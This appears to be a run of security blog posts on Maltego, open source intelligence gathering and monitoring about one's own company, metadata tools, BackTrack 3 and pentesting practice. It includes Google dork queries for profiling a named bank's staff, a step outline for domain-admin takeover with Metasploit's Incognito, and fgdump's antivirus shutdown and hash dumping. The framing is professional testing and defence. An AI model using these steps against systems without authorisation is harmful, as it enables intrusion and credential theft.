Download the white paper.  Download Josh’s Metasploit modules.  Download Kevin’s vulnerable web services.

UPDATE (5/27): I found a very nice script by Patrick Toomey which can dump the contents of the keychain on Jailbroken iOS devices.  More details about how the script runs can be found in this blog post.  Note that the type of information you get back depends if the passcode is enabled or not.  You will get more keychain entries back if the passcode is not enabled.  I had mentioned in my presentation that I hadn’t found a script to do this yet…well here it is.

Setup and UI
The first thing you will notice is the startup wizard (Figure 1) that walks you though setting up your license and updating the TAS to download new transforms.  The wizard is a welcome addition especially for new users.

Figure 1. The Maltego 3 startup wizard.

You will notice that the transform manager itself has also gotten a face lift with a column showing you if a disclaimer is required or not (Figure 2).

Figure 2. The transform manager now shows you which transforms have a disclaimer or not.

Another noticeable change is the UI.  It’s sleek and sexy.  I also like how the main menu is grouped into two tabs: Investigate and Manage (Figures 3 and 4).  The Paterva team did a great job grouping items so its easy to select what you need.

Figure 3. Menu items are grouped into two tabs now.  Items are much easier to select.  This is the “Manage” tab.

Figure 4. The “Investigate” tab.

Back to the main UI.  Adding objects is similar to before but it’s faster and more responsive.  Figure 5 is a screen shot of the entire UI.

Figure 5. Simple Twitter search using the new Maltego 3 UI.

Entities connected to each other are easier to view.  When arrows connect to entities they move around other objects. (Figure 6).

Figure 6. Maltego 3 offers some nice UI improvements when moving entities around the screen.

Site Links and Entity Listings
Two other items I want to mention are some improvements on how links to and from a site are shown and the entity listing feature.  The site links transform rocks.  You can now see incoming and outgoing links to a website entity.

Figure 7. Links in and out of a website are easy to obtain in Maltego 3.

Lastly, I found the entity listing view most helpful.  This allows you to search and sort all the entities in your Maltego UI into a nice easy to view list (Figure 8).  Also, the dynamic view is pretty sweet as well.

Figure 8.  The entity list view provides a great way to search for things within the UI.

You can get the commercial version of Maltego now and the Community Edition is right around the corner.  Version 2 users can also use your same license key with Maltego 3.  Win!  Also, if your hesitant about buying a commercial product like this, don’t be.  Maltego is quite affordable for all the power you get and well worth it.  Reconnaissance is fun again!   More information about Maltego 3 is here.

OSINT and Monitoring
After reading this series you are probably asking yourself…what do I do will all of these feeds and information that I have gathered?  Much of the information you have found about your company may be pretty overwhelming and you might find there is a ton of noise to filter through to get to the “good stuff”.  The next sections of this article will hopefully help you organize these feeds so you can begin a basic monitoring program.

What do you want to monitor?
This first thing you want to ask yourself…what do you want to monitor and what is most important?  You probably have noticed that it would be difficult to monitor the entire Internet so focus on what is relevant to your company or business.  Also, you want to pay particular attention to the areas of social media that your business has a presence on.  For example, if your business has a Facebook page, LinkedIn group and Twitter account you should be paying special attention to these first.  Why?  These are the sites that you have most likely allowed certain employees to use this form of media for business purposes.  Lastly, keep in mind that choosing what to monitor should be a group collaborative effort.  Get your marketing and public relations people involved in the decision making process.  As a bonus, it helps with making security everyone’s business.

Free tools to aggregate this information
Lets discuss briefly some tools to aggregate and monitor all the information sources you have decided as important.  There are two tools that I will talk about.  Yahoo! Pipes and RSS readers (specifically Google Reader).

1. Yahoo! Pipes
First, what is Yahoo! Pipes?  The best description is probably found on the Yahoo! Pipes main page:

“Pipes is a powerful composition tool to aggregate, manipulate, and mashup content from around the web.  Like Unix pipes, simple commands can be combined together to create output that meets your needs:

- combine many feeds into one, then sort, filter and translate it.
- geocode your favorite feeds and browse the items on an interactive map.
- grab the output of any Pipes as RSS, JSON, KML, and other formats.

The great thing about pipes is that there are already many different mashups that have already been created!  If you find one that doesn’t do what you like it to…you can simply copy a pipe, modify it and use it as your own.  Creating a pipe is really easy as well.  Yahoo! provides good documentation on their site even with video tutorials if you are lost.  Everything is done in a neat visual “drop-n-drag” GUI environment.  For example, you could take some of the sites that you find a bit more difficult to monitor, configure them in a pipe and send the output to RSS.  Once you have an RSS feed you can plug this into a RSS reader (like Google Reader) for monitoring.  Here are a few of my favorite pipes (pre-built) that can be used for monitoring:

Social Media Firehose
Social Media Monitoring Tool
Aggregate Social Media Feeds by User & Tag
Twitter Sniffer for Brands
Facebook Group RSS Feed, improved version here

2. Google Reader or your favorite RSS reader
The second part of your monitoring toolkit is to put your Yahoo! Pipe RSS feeds and the other feeds you determined as important and put them into the RSS reader of your choice.  I personally like Google Reader because it’s easy to use and manage.  However, you may prefer a desktop client or some other type of reader…all up to you.

What’s easy and works best?
First, assign someone to look at the information you are monitoring.  This should be someone in your information security department and someone with social media skill sets.  Next, create RSS Feeds from identified sites and utilize Yahoo! Pipes to customize and filter out content if you need to.  Finally, plug these feeds into your RSS reader and set up procedures for monitoring.  When will you check these feeds? What happens if the monitoring person is out?  Is there a backup for this person?  These are just a few of the things you need to think about when putting together these procedures.  There may be many more (or less) depending on your business.  Lastly, for sites you can’t monitor automatically determine manual methods and be sure to build procedures around them.

What is the company social media strategy? Do you even have one?
The first thing you need to do before you create policies or standards around what employees can or can’t do on social media/networking sites (related to your business), is to define a social media strategy.  Without a strategy defined it would be nearly impossible to determine a monitoring program without knowing what areas of social media your business is going to participate in.  This is a very important step and is something that your marketing/public relations/HR departments need to determine before security gets involved.

Internet postings or the “social media” policy
What if you have policies for Internet usage already in your company?  If you do, have you checked to see if they include specific things like social networks?  How about commenting on company news or issues on public social networks?  This is an area where many of the “standard” Infosec or HR policies don’t cover or don’t mention procedures about how employees use this new world of social media.  The other important part is that you need to partner with marketing/public relations/HR to collaborate on this policy.  The design and creation needs to have input from all of these areas of the business, especially these groups because they are going to be the main drivers for the use of social media.  Lastly, what is acceptable for employees to post?  Keep in mind that employees have Internet access *everywhere* nowadays.  iPhones, smartphones, Google phones…employees have these and guess what?  They are most likely using them at work.  How do you know that they are not commenting about company confidential business?  With this new generation of devices…the line between personal and company business will continue to blur. Oh, and this is just one simple example!

Examples of good policies to reference
So where do you go from here?  Create the policy!  The last part of this article has examples of good policies that you can reference when creating your own policies.  There is lots of good information in the following links and you can customize these for your own environment and business situation:

Cisco Internet Postings Policy
Intel Social Media Policy
4 Tips for Writing a Good Social Media Policy
10 Steps to Creating a Social Media Policy for your Company

Remember, monitoring the use of social media and creating policies around them is new and potentially uncharted territory for many organizations.  Hopefully with this series (and the related presentation) will help guide you and your organization to make the right decisions on finding information about your company, creating a monitoring program and working with your business partners to create the right policies for your business.

UPDATE: You can download my slide deck now on SlideShare.

Part one of the series discussed ways to gather OSINT on social networks and some of the challenges this creates.  Besides gathering OSINT on social networks there are many more sources of information that company information may be posted on.  These include blogs, message boards and document repositories.  One of the byproducts of finding documents is metadata, which I will explain in more detail below.

OSINT and Blogs
Blogs can be searched via any traditional search engine, however, the challenge with blogs are not necessarily the posts themselves but the comments.  When it comes to blog posts the comments are usually where the action is, especially when it comes to your current and former employees (even customers) commenting on highly sensitive pubic relations issues that a company might be conducting damage control over.  The other point to make about commenting is that employees might be posting things that be violating one of your policies and cause brand reputation problems.  Examples of this are all the countless leaks of profits, downsizing, confidential information and more that the news media reports on.  Wouldn’t be great to be monitoring blogs and their comments to find these things out before they go viral?

Listed below are some of the blog and comment search sites that I recommend you add to your monitoring arsenal which I will talk about creating in part three:

Social Mention http://socialmention.com (has *great* comment search and RSS for monitoring)
Google Blog Search http://blogsearch.google.com (great for creating RSS feeds and very customizable)
Blogpulse http://www.blogpulse.com/ (has comment search)
Technorati http://technorati.com/
IceRocket http://www.icerocket.com/
BackType http://www.backtype.com/ (has comment search)
coComment http://www.cocomment.com/ (has comment search)

OSINT and Message Boards
Message boards have always been a great source of OSINT.  Message boards date back before blogs were popular and are still widely used today.  Because there are so many message boards out there that could contain good OSINT you really need to use message board search engines unless you know about specific message boards that you know your employees use (or could).  Good examples of these are job related message boards like vault.com or Yahoo/Google Finance discussion forums or groups centered around stock trading.

Here is my list of message board search engines and a few that might be more specific for a company:

Google Groups http://groups.google.com/ (always a good choice for creating RSS feeds and very customizable)
Yahoo! Groups http://groups.yahoo.com/
Big Boards http://www.big-boards.com/ (huge list!)
BoardReader http://boardreader.com/ (very good search and RSS feeds of results)
Board Tracker http://boardtracker.com/ (very good search and RSS feeds of results)

More specific:
Craigslist Forums http://www.craigslist.org/about/sites (RSS available)
Vault www.vault.com (job/employee discussions)
Google Finance http://www.google.com/finance (search for company stock symbol and check out the discussions)
XSSed http://www.xssed.com/ (XSS security vulnerabilities)
Full Disclosure Mailing List http://seclists.org/fulldisclosure/ (Security vulnerability disclosure)

Document Repositories
Something that I have seen more of recently are sites called document repositories.  These sites either aggregate documents found from various sources on the Internet or people can upload their own documents and presentations for public sharing purposes.  These sites are probably my favorite since you will find all sorts of interesting information!  Here is my list of favorites:

Docstoc http://www.docstoc.com/
*Really good document search engine.  I wish there was better RSS for it but they have an API in which Yahoo! Pipes could probably be used.

Scribd http://www.scribd.com/ (RSS feed of results)
SlideShare http://www.slideshare.net/ (RSS feed of results)
PDF Search Engine http://www.pdf-search-engine.com/
Toodoc http://www.toodoc.com/

Great! You found documents.  Now what?
Once you find interesting documents be sure to check out the document metadata.  What is metadata? Metadata is simply “data about data”.  Metadata in documents is traditionally used for indexing files as well as finding out information about the document creator and what software was used to create the document.  It goes without saying that document metadata is a treasure trove of information that could be used against your company.  For example, vulnerable versions of software that can be used for client side attacks, OS versions, path disclosure, user id’s and more can all be viewed through document metadata.

There are lots of good tools to pull out metadata from documents and pictures. With some of these tools it’s even possible to write a script to automatically strip metadata from documents and pictures (start with the script Larry Pesce wrote in his SANS paper below).  However, the best method for removing metadata in my opinion is to make sure it’s removed (or limited) in the first place!  If you are creating a new document make sure you are removing it or not allowing the application to save some of the more revealing things like user id’s and OS/version numbers.  If you want more detail on metadata and how to use some of the tools that are available check out the great paper over at the SANS InfoSec Reading Room titled “Document Metadata, the Silent Killer created by Larry Pesce.  Here is a short list of tools I use (or have used) to analyze metadata:

EXIFtool http://www.sno.phy.queensu.ca/~phil/exiftool/ (my personal favorite! The swiss army knife of metadata tools)
Metagoofil http://www.edge-security.com/metagoofil.php
Maltego (built-in metadata transform) http://www.paterva.com/web4/index.php/maltego (another favorite!)
Meta-Extractor http://meta-extractor.sourceforge.net/
FOCA http://www.informatica64.com/foca/

What’s the deal with brand reputation?
One last point I want to make is about brand reputation.  You may ask yourself, how does brand reputation relate to information security? Why should we care?  I have found it interesting that many of us in information security have been asked to do more research on brand reputation issues because no one else in the company had those types of skill sets to monitor information.  Brand reputation is vital to an organization, even more so in this economy.  Think of the CIA triad…Confidentiality, Integrity and Availability.  All three have aspects that reflect brand reputation.  All of us in information security need to be thinking of brand reputation in our daily job.

Next up in part three
In part three I will talk about setting up a simple monitoring program with the sites and tools I have mentioned thus far.  This will include how to start using Yahoo! Pipes to aggregate many of the feeds I talked about.  I will also conclude with information on how to create a Internet Postings Policy or now better known as a Social Media Policy for your company and why this is more important then ever.

Next week I will be speaking at the 7th Annual Ohio Information Security Summit on “Enterprise Open Source Intelligence Gathering”.  Here is the talk abstract:

What does the Internet say about your company?  Do you know what is being posted by your employees, customers, or your competition?  We all know information or intelligence gathering is one of the most important phases of a penetration test.  However, gathering information and intelligence about your own company is even more valuable and can help an organization proactively determine the information that may damage your brand, reputation and help mitigate leakage of confidential information.

This presentation will cover what the risks are to an organization regarding publicly available open source intelligence.  How can your enterprise put an open source intelligence gathering program in place without additional resources or money.  What free tools are available for gathering intelligence including how to find your company information on social networks and how metadata can expose potential vulnerabilities about your company and applications.  Next, we will explore how to get information you may not want posted about your company removed and how sensitive metadata information you may not be aware of can be removed or limited.   Finally, we will discuss how to build a Internet posting policy for your company and why this is more important then ever.

Leading up to my talk at the summit this series of posts will focus on several of the main topics of my presentation.  I plan on referencing these posts during the presentation so attendees can find out more information about a specific topic that will be discussed.  I will touch on the following main points in this series: Part 1 – Gathering intelligence on social networks, Part 2 – Gathering intelligence from blogs/message boards/document repositories, Part 3 – Putting together a simple monitoring program/toolkit and creating a Internet postings (social media) policy for your company.

This first post in the series will focus on gathering intelligence on social networks.  The topic of gathering intelligence from social networks will be looked at in two ways.  First, through the eyes of the penetration tester or attacker.  Second, from a monitoring perspective relative to the enterprise and business.

What is OSINT?
Open Source Intelligence (OSINT) is basically finding publicly available information, analyzing it and then using this information for something.  That something can be extremely valuable from the eyes of an attacker.  For a fantastic overview of how OSINT is used specifically from a penetration testing perspective I suggest you check out the presentation that Chris Gates recently did at BruCON.  Chris goes into detail and provides good examples on how OSINT can be used in gathering intelligence on a network infrastructure as well as how to profile company employees.  All of the techniques Chris talks about should be used in a penetration testing methodology.

Why look for OSINT about your company?
I have found that OSINT is surprisingly often overlooked by most businesses from a security monitoring perspective.  If a company does any monitoring of public information at all it is usually found in your public relations and/or marketing groups.  These groups traditionally don’t look for things that could be used to target or profile an organization.  The same information that is being viewed by your PR/Marketing department needs to be looked at by your in house information security professionals.  Specifically, I suggest people in your information security department with an “attacker mindset” look at this OSINT.  This could be people on an internal penetration testing team or someone involved with the security assessments in your organization.  You should really ask yourself: If you don’t know what information is publicly available about your company…how can you properly defend yourself from attack?

OSINT and Social Networks
Social networks have recently become the 4th most popular method for online communication (even ahead of email) today.  If you are not looking for OSINT on social networks you are potentially missing major and vital pieces of information.  Having said that, searching for OSINT on social networks brings its own challenges and needs to be looked at slightly different then looking at other forms of OSINT.  For example, you might find that searching for information on social networks like Facebook different because there is both private and public information.  Facebook as an example has a built in search feature “behind” a valid login id and password.  Searching Facebook in this manner can yield better results then just going to Google or using a specific social network search engine (I’ll talk more about Facebook below).

1. Social Network Search Engines
There are lots of different search engines that specifically look for “public” information on some of the major social networks.  The disadvantage about these types of search engines is that they only pull public information that can be easily indexed.  Private information like the Facebook example above cannot be indexed without violating the TOS (Terms of Service) even though there are tools like Maltego that can have transforms written to “page scrape” this information (more on that in the Maltego section below). Here is a list of social network search engines that I recommend you check out to search for this type of public information (there are more…this is just the list I use).  While there are other ways to search specific social networks (like search.twitter.com or FriendFeed) the list below just mentions search engines that search multiple networks:

Wink http://wink.com/
Spock http://spock.com (has a search for “private” profile info but is a pay service…haven’t checked that feature out)
Social Mention http://socialmention.com/
WhosTalkin http://www.whostalkin.com/ (this is one of my favorites! Lots of socnets included!)
Samepoint http://www.samepoint.com/
OneRiot http://www.oneriot.com/
Kosmix http://www.kosmix.com/
YackTrack http://www.yacktrack.com
Keotag http://www.keotag.com/
Twoogle http://twoogel.com/ (Google/Twitter search combined)
KnowEm Username Check http://knowem.com/
Firefox Super Search Add-On https://addons.mozilla.org/en-US/firefox/addon/13308 (over 160 search engines built in)

Don’t forget about photo/video social networks and social bookmarking sites:

Pixsy http://www.pixsy.com/
Flickr Photo Search http://www.flickr.com/search/?s=rec&w=all&q=”comapny name”&m=text
YouTube/Google Video Search http://video.google.com/videosearch?q=”company name”
Junoba Social Bookmark Search http://www.junoba.com/ (Digg, Delicious, Reddit, etc..)

Pay Services (might be worth checking out):

Filtrbox http://www.filtrbox.com/
Vocus http://www.vocus.com/

2. Maltego
Maltego goes without saying…it’s probably the best tool to “visually” show you information found on some of the social networks and the relationships that information has connected to it.  I have found that Maltego works well for Twitter, Facebook, LinkedIn and MySpace profiles (publicly available).  The Twitter transforms are probably the highlight since you can dig into conversations as well.  There is also a Facebook transform that was specifically written to search within the Facebook network using a real user account.  However, this transform doesn’t work anymore due to recent structural changes to the way Facebook HTML was coded.  Note that this transform violates Facebook TOS since it did screen scraping but when it did work it was a great way to search status and group updates not available to public search engines!  If anyone wants to help get this transform working again there is a thread on the Maltego forum about it.

Lastly, if you want more information on Maltego and how to use it I suggest checking out the work Chris Gates has done in his Maltego tutorials here and here to learn more.  Keep in mind.  Maltego works great for finding information if you need it for a specific scope, like a pentest.  Maltego even works great if you need to dig a little deeper into something you find on a social network.  In terms of automating a monitoring process, I suggest using Google dorks, Yahoo Pipes!, and other techniques which we will talk about here and in future posts.

3. Google Dorks (Facebook, MySpace, LinkedIn)
While you can just simply type in your company name into Google and see what comes up…It’s way easier to use a little Google dork action to search for information on specific social networks.  As I stated before, this will only pull publicly available information but you might be surprised what you find about your company just in these searches!  Simply paste these into the Google search bar/window.  Note: change “bank of america” to whatever you like…not picking on bofa but there is a ton of information about them on social networks!

Facebook Dorks
Group Search: site:facebook.com inurl:group (bofa | “bank of america”)
Group Wall Posts Search: site:facebook.com inurl:wall (bofa | “bank of america”)
Pages Search: site:facebook.com inurl:pages (bofa | “bank of america”)
Public Profiles: allinurl: people “John Doe” site:facebook.com

*To search personal profile status updates (unless they were made public wall posts via pages or groups) you need to be logged into Facebook and use the internal Facebook search engine.  Setting your status updates privacy settings to “Everyone” is actually everyone in Facebook.  Rumor has it that next year “Everyone” will mean everyone on the Internet! FTW!

MySpace Dorks
Profiles: site:myspace.com inurl:profile (bofa | “bank of america”)
Blogs: site:myspace.com inurl:blogs (bofa | “bank of america”)
Videos: site:myspace.com inurl:vids (bofa | “bank of america”)
Jobs: site:myspace.com inurl:jobs (bofa | “bank of america”)

LinkedIn Dorks
Public Profiles: site:linkedin.com inurl:pub (bofa | “bank of america”)
Updated Profiles: site:linkedin.com inurl:updates (bofa | “bank of america”)
Company Profiles: site:linkedin.com inurl:companies (bofa | “bank of america”)

While these are Google dorks from the top three social networks (Twitter actually has a really good search engine, search.twitter.com, which I don’t think needs explaining), you can easily modify these for your own use and even include more advanced search operators to include or exclude additional queries.  The point of using Google dorks is to make it easier to quickly search for information on social networks without going to each site individually.  Still, with most social networks if you want to find private information you either need to login as a user or use some social engineering get the information you want.

What’s next?
In part three of this series I will talk about how to use Google dorks and various search queries for monitoring purposes.  Once you have the dorks you want to query, it’s trivial to plug these into Google Alerts to create RSS feeds.  Take your feeds and plug them into your favorite RSS reader and you have a simple monitoring tool.  More on this in part 3 including a section on aggregating this type of into and customizing it via Yahoo! Pipes which I like to think as the preferred and most customizable method for monitoring social networks.

Next up…in part 2 I will talk about how to find company information on blogs, message boards and document repositories.  Oh, and sprinkle a little bit of metadata into the mix as well.

Old School!
Wireshark
Ettercap
Cain

New School!
Network Miner
The Middler
SSLStrip

* Note: …both the new and old school tools provide the pentester with a ton of value! Use them all!

MITM Defense
ArpON
ArpWatch

UPDATE: Click here to view the slide deck.

Oh and if that wasn’t enough the pentest entities are now also available locally!

Great work Maltego team! Check out the full announcement here.

What is Maltego if you don’t know about it?
“Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates. Maltego’s unique advantage is to demonstrate the complexity and severity of single points of failure as well as trust relationships that exist currently within the scope of your infrastructure.

The unique perspective that Maltego offers to both network and resource based entities is the aggregation of information posted all over the internet – whether it’s the current configuration of a router poised on the edge of your network or the current whereabouts of your Vice President on his international visits, Maltego can locate, aggregate and visualize this information.”

Read more about Maltego here.

Features:

* Copy and paste to/from graphs
* Copy and paste to/from text
* Above can also function as “import”
* Zoom to pointer
* Looking glass zoom mode
* Added notch on slider that will return 10,000 entities (if your RAM can stomach it)
* Brought back “Run All Transforms” – you asked for it!
* Cancel transform run (e.g. i clicked on the wrong transform and it’s taking forever while my graph is turning into a green mush, can we please stop this now)
* Easier Mac install

Fixes:

* Authentication proxies now works (including NTLM)
* Cancel on entity export (small annoying fix)
* Transform manager window resizes properly (useful for those on E^3s)
* The dreadful save bug has been fixed (if you never saw it count yourself lucky)

In addition they note the in the upcoming 2.1 version they will be allowing local scriptable transforms! I am really looking forward to this feature as the custom transform creation process will hopefully get a whole lot easier.

Note that the main download page doesn’t have the new package yet so if you want it now you need to get the download links from the forum post here. I would expect the main site updated later today.

Also…the crippled “community edition” is still on the old version for now (updated shortly I am sure). By the way, it’s only $430 USD for the first year, $320 USD per year thereafter for a license of the commercial version…well worth it!

You can download the presentation here. Like I mentioned at the talk you can get more information on Maltego from the Paterva website. If you are looking for a few good tutorials you can check out part one and part two on Room362.com or Ethicalhacker.net.

How does Incognito work? I won’t go into a ton of detail as you can check out CG’s posts over at Carnal0wnage. He did an awesome two part write up about the tool…in detail…you should check out. Here are the high level steps:

1. Ensure you have the latest Metasploit snapshot. Not by doing an “svn update” either…you have to use Subversion and do an “svn co http://metasploit.com/svn/framework3/trunk/”. Run msfconsole through this trunk. Be warned that Subversion is picky with proxy servers if you have to deal with that.
2. Exploit system with Metasploit and a meterpreter payload.
3. Follow CG’s posts (linked above)
4. Once you impersonate the domain admin, use the tool in your meterpreter shell to create a domain user and add your new user to the domain admins group (again…follow CG’s posts).
5. Continue on with your domain compromise…rinse and repeat with your next client and/or pentest!

As a pentester you should be familiar with most of these areas, meaning, you should have working knowledge at a minimum. Of course, reverse engineering and vulnerability development may not be everyone’s forte…but take for example the web application pentester. Reverse engineering and vulnerability development is a skill that can be learned (especially if you have a deep programming and development background). Same goes for wireless penetration testing as someone with a networking background can easily pick this up. Everyone will still have their own specialty but you can still expand on your existing skills to learn new ones.

What’s the point? The more you and your team learn the more valuable you become to your organization, clients and your own career.

While we will always need to conduct traditional network and web application penetration tests, clients and employers are asking us to conduct more “unique” assessments. These unique types of assessments include things like social engineering, client-side phishing, physical security reviews, user security awareness, or testing the overall security of a specific facility or business unit. These unique individual assessments are addressing the changing threat landscape and new ways information systems and people are being exploited.

A tiger team can address many of these different types into one unique assessment of it’s own (including network and web application penetration when appropriate). Keep in mind, a tiger team operation is very different then a penetration test in terms of quality and quantity as GNUCITIZEN mentions. A tiger team requires multiple unique skill sets (for example a physical security specialist) and always requires multiple high performance team members. Let’s also not forget about timing and preparation. A tiger team operation and a penetration test should always be conducted unannounced and to conduct the operation properly the team must be held to strict confidentiality. In regards to preparation, a tiger team operation may take many weeks and/or months to prepare. Why so long? The longer preparation time (meaning the reconnaissance phase) the closer you will get to simulating an actual attack on the targets selected. The real bad guys that want to do harm to your organization have the advantage of time…a tiger team must try to replicate this as close as possible. There may also be variations of a tiger team operation as well. Some methods may or may not need to be used depending on the scope and the target(s).

I am currently putting together a presentation for a conference later this year on how tiger team assessments work in a large corporate environment and how you can take these same concepts and use them either with an internal penetration testing program or for clients. More on this in the coming weeks. In the meantime, if you want to know what a tiger team operation/assessment is like…I recommend you check out the Tiger Team series that was on TruTV last year. You can find torrents and also view one of the episodes on the TruTV web site.

SAINT
SAINT has provided BackTrack users with a functional version of SAINT, pending a free request for an IP range license through the SAINT website, valid for 1 year.

Maltego
The guys over at Paterva have created a special version of Maltego v2.0 with a community license especially for BackTrack users. We would like to thank Paterva for co-operating with us and allowing us to feature this amazing tool in BackTrack.

Nessus
Tenable would not allow for redistribution of Nessus on BackTrack 3.

Kernel
2.6.21.5. Yes, yes, stop whining….We had serious deliberations concerning the BT3 kernel. We decided not to upgrade to a newer kernel as wireless injection patches were not fully tested and verified. We did not want to jeopardize the awesome wireless capabilities of BT3 for the sake of sexiness or slightly increased hardware compatibilities. All relevant security patches have been applied.

Tools
As usual, updated, sharpened, SVN’ed and armed to the teeth. This release we have some special features such as spoonwep, fastrack and other cool additions.

Availability
For the first time we distribute three different version of Backtrack 3
– CD version
– USB version
– VMWare version

BackTrack 3 final download page is here.

Final Requests
We request the community to not mirror or torrent this release, or otherwise distribute it online without our knowledge. We are trying to gather statistics about bt3 downloads. If you would like to mirror BT3 then please:

1) Think again! Traffic generated by BT3 downloads is CRAZY.
2) Please contact us before doing so.
3) Send us monthly statistics of downloads for the iso.

If you would like to add a link to BackTrack downloads to your website, please use:

http://www.remote-exploit.org/backtrack_download.html as the download link.

Rants
Problems, fixes, bugs, opinions – should all end up in our Remote Exploit community forums, and our wiki.

Awesome that Maltego has been added to Backtrack! Safe to say that Maltego is the best Internet reconnaissance tool out there. Too bad about Nessus but I hear SAINT is a good vulnerability scanner alternative (note that SAINT is a commercial product like Nessus but they don’t have a “home user” plugin feed like Nessus provides). Also, be sure to link to the Backtrack 3 download as Max specifies. Please don’t torrent the iso as they would like to track overall download statistics.

One final reminder, the Security Justice podcast will be interviewing Dave Kennedy of SecureState on the Fast-track script he developed. Fast-track in included in the Backtrack 3 distribution and is an integral part of using Backtrack 3 to it’s fullest potential. Look for this special edition podcast in the next week or so.

Very good interview over at The Ethical Hacker Network with Ed Skoudis of Intelguardians. Ed talks about his career, how Intelguardians came to be, his new SANS 560 Course, and a little about his hacker challenges that he is famous for. I know several of the Intelguardians and I have a huge amount of respect for all of them. If you are just getting into information security or penetration testing, Ed is one person that should be a role model for your career.

From the article’s author it looks like part two and three will be with Johnny Long and HD Moore. Awesome stuff…looks to be like a great series of interviews.

I came across this post by Martin McKeay on the Network Security Blog today talking about changes to the Nessus license that Tenable will be starting July 31st. Martin makes some really good points and I recommend you read his post. Basically as a corporate user you will need to pay for the new “ProfessionalFeed”. A corporate user is classified as anyone that uses Nessus in a corporate environment, including MSSP’s and security consultants (some exceptions apply for non-profit and charities). From the Nessus announcement:

“…Tenable’s “Direct Feed” will be re-named to the “ProfessionalFeed” and the “Registered Feed” will be discontinued. The ProfessionalFeed will entitle subscribers to the latest vulnerability and patch audits, configuration and content audits and commercial support for their Nessus 3 installation. The ProfessionalFeed will serve as Tenable’s commercial subscription and will be required for individuals and organizations that want to use Tenable’s Nessus plugins commercially.”

Looks like you are now getting everything that you would have gotten if you were a previous “commercial” user including support for Nessus 3. Home users will still be allowed to download the free “HomeFeed”.

My thoughts are that I personally get a ton of value out of Nessus…it’s simply the most versatile vulnerability scanner out there (from a pentest and customization perspective especially). Now that it is going to this “pay for plugins” model it doesn’t really change much for me..I think the Tenable guys do great work and now that they will have more cash flowing in I would suspect the Nessus product offering will only get stronger.

Oh, and don’t forget that Tenable is offering a limited time rebate for corporate users:

“Tenable is offering a 25 percent rebate for the Direct Feed subscription service (normally available at $1200 per year), beginning May 14, 2008 until July 31, 2008 only when purchased through Tenable’s e-commerce site.”

“The foofus.net team is pleased to announce updates to both fgdump (2.0.0) and pwdump (1.7.1), which incorporate a number of new features, the most significant of which is that both tools now support 64-bit targets.

http://www.foofus.net/fizzgig/fgdump
http://www.foofus.net/fizzgig/pwdump”

If you don’t know what fgdump is and how it differs from pwdump…basically, fgdump attempts to shutdown local anti-virus before attempting to dump the password hashes and it also pulls cached credentials. Fgdump is a great tool if you still need to dump the hashes of a system (which in a pentest I always like to conduct a password strength test for clients by running hashes through John (large wordlist and incremental mode). Once you have the hash, you can also use a “pass-the-hash” utility like the one created by the foofus.net team (for Linux) or the one released by Core Security Technologies (for Windows).

John Sawyer over at Dark Reading put out a post about the importance of documentation as it relates to your pen test’s. I couldn’t agree more as documenting your methodology, testing it, and even having it reviewed by your peers are very important. I wrote a post a few months back about the importance of documentation and what some of the best practices are around how a team documents a pen test in progress. Even more important is having your basic methodology for testing well documented.

Your testing methodology should be the cornerstone of any pen test. Without a sound, repeatable methodology it would be very difficult to provide your client or organization with the systematic approach you used to conduct your testing and how you achieved your results. Most penetration testers follow some form of the ISSAF or OSSTMM methodologies and it’s ok to deviate slightly since every company and organization does things differently.

The hard part, as John points out, is that no one wants to do documentation! It’s time consuming and boring. Sure, we would all rather be out exploiting systems but you really need to think of the bigger picture here. Here are some basic suggestions:

- Talk about your methodology after each and every pen test with your team (make this part of the last phase of the pen test even). What went wrong? What went well? You can always make on-the-fly adjustments to your documentation if you need to and it will foster better communication between your team members.

- Rotate the documentation review process from one team member to another. That way not one person is stuck updating and maintaining your documentation. Also, if you have a system where one person does all the reports for your pen tests…make sure this isn’t the same person! That can lead to serious burn out (writing the reports can cause burn out as well but that’s another post entirely!).

- Schedule “documentation and tool review” sessions several times a year with your team. This is a great way for everyone on the team to provide feedback on the current testing process and methodology and make changes if necessary. Also because tools are always being updated and new ones are being released, you should talk about adding/removing these tools from your team’s toolkit based on the needs of team.

“Hello, I am new to pen testing and am currently involved in doing an external pen test for one of our clients.We are doing it through Core Impact.Reconnaisance showed only port 80 as open and the web server running IIS 6.0.Core Impact did not find any vulnerabilities in the server and hence was unable to penetrate.The web application was also tested for SQL Injection and PHP remote file inclusion and did not find any vulnerabilities there either.

My question is what else can we do besides relying on Core Impact for this pen test.And what impression can a client get if we say to them that there are no vulnerabilites in your network or web app.Its dificult to digest something like that for a security specialist that everythings alright. “

I know, I know…where do you possibly begin with this one right?

Some points to consider from this (as others on the list have pointed out). Never rely on one tool to conduct a penetration test. Sure, CORE IMPACT is an awesome tool and does provide a ton of value in a penetration test, however, CORE won’t tell you all the vulnerabilities on a network nor will it give you a comprehensive overview of the security posture of an organization. You have to use a diverse toolkit. Your toolkit should include a mix of commercial, open source, and proprietary tools. Most proprietary tools come in the flavor or custom built scripts to make a penetration testers job easier. Don’t forget that the biggest asset to your toolkit is your brain! Sometimes you don’t need any tools at all…think like a hacker, think of even the obscure ways to compromise a host. That is why there are penetration testing methodology’s…each phase of a penetration test (from reconnaissance to exploitation) can reveal information to help you compromise a host/network/application and reveal vulnerabilities. Put your brain to work…it can be better then any tool out there.

CORE works extremely well to find “the easiest way” to get root or administrator access on a host. I did a few talks on automated penetration testing with CORE IMPACT and the Metasploit Framework over the last few months and I always mention that you can’t fully automate a penetration test…there is a time and place for automated penetration testing but you still need manual, detailed testing.

Finally, you should provide your clients and/or organization with a comprehensive report of all the possible ways you found to compromise the network (within the scope of course). Yes, there are differences between a “vulnerability assessment” and a “penetration test”, however, you still need to provide your client/organization of a report of all vulnerabilities found rated by risk even in a penetration test. Don’t forget about the human element as well. Client side phishing (which CORE does a great job of), calling users via telephone posing as a help desk employee, or coming up with other social engineering scenarios all can assist with determining the current security posture and also to get you access hosts on the network.

Anyway, check out the project…looks like there is a pretty good selection of content already. Submit some links if you get a chance. It’s always good to support community projects like these!

Last night I did a talk on “Automated Penetration Testing with the Metasploit Framework” to a local information security group in Cleveland, Ohio. This was the last talk in a two part series on automated penetration testing tools. Last month I spoke about CORE IMPACT by Core Security Technologies which is a commercial penetration testing tool.

What is Metasploit and autopwn?
